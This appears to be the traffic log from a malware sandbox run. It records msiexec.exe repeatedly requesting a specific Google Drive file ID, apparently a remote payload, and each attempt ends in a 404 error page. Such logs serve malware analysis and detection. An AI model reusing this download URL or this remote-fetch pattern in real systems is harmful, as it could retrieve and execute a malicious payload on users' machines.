2025-01-11 03:27:11 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 4d 65 48 47 34 31 62 52 39 36 63 52 73 61 32 36 67 39 61 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1MeHG41bR96cRsa26g9aug">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.11	49990	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:12 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:12 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:12 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-4NWHBiN16P_MAPmSbWEl_A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.11	49991	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:13 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:13 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgS4K3v691dd15FpeR0vPdjYpFmI3fYVqbjwMi7_88B_fX5in2LrIy0viCt5adCHf4lT Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:13 GMT Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'nonce-q-qllZzet6PSwiZDCbNzUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:13 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 37 5f 6b 31 49 6c 4f 6a 73 68 37 71 61 33 45 66 63 48 77 76 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H7_k1IlOjsh7qa3EfcHwvA">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.11	49992	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:14 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:14 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:14 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-FYslEcD73Is21xJauuVgCA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.11	49993	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:15 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:16 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQxSg3cPI-AKBTmkLkAE35CTiipc2INTbwpvf5tQnLFX9D99ewl6NbwCaUvMQASXCFw0luVYNw Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:15 GMT Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-RSO5_EGf8vY3h2WN5sK5iQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:16 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 72 57 41 35 65 73 4a 54 6f 55 6d 47 7a 6e 64 65 6c 53 6a 79 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MrWA5esJToUmGzndelSjyw">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.11	49994	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:16 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:17 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:17 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-_3fzHTyvBxOl5TaUpzpR2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.11	49995	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:17 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:18 UTC	1844	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgT8nGpbmcG2OB-TbH9dBcdmOKT13tDd1ykyQCQX_rR0T10xFVBQu351kDdIUoquXhDD Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:18 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-UJ88aMND4j4t6XqBeWzMGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2025-01-11 03:27:18 UTC	1652	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 44 54 64 4f 75 79 6a 53 4f 42 79 41 73 4e 4e 43 42 36 6f 6c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6DTdOuyjSOByAsNNCB6olQ">*{margin:0;padding:0}html,code{font:15px/22px arial

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.11	49997	142.250.184.238	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:19 UTC	417	OUT	GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:19 UTC	1920	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:19 GMT Location: https://drive.usercontent.google.com/download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-uCUJF8DDaHIzAbNtcFK9pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Cross-Origin-Opener-Policy: same-origin Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.11	49998	142.250.185.161	443	7536	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 03:27:20 UTC	459	OUT	GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
2025-01-11 03:27:20 UTC	1851	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFIdbgQ0wwe0MIGr6svzc_2bDbviQSEq6AMiE5rdXxCVwnAEoc1AmvHseanm6LvjqkIFBMmCV0gumwg Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Sat, 11 Jan 2025 03:27:20 GMT Content-Security-Policy: script-src 'nonce--leIgwePYLAne0ioj4VpRQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
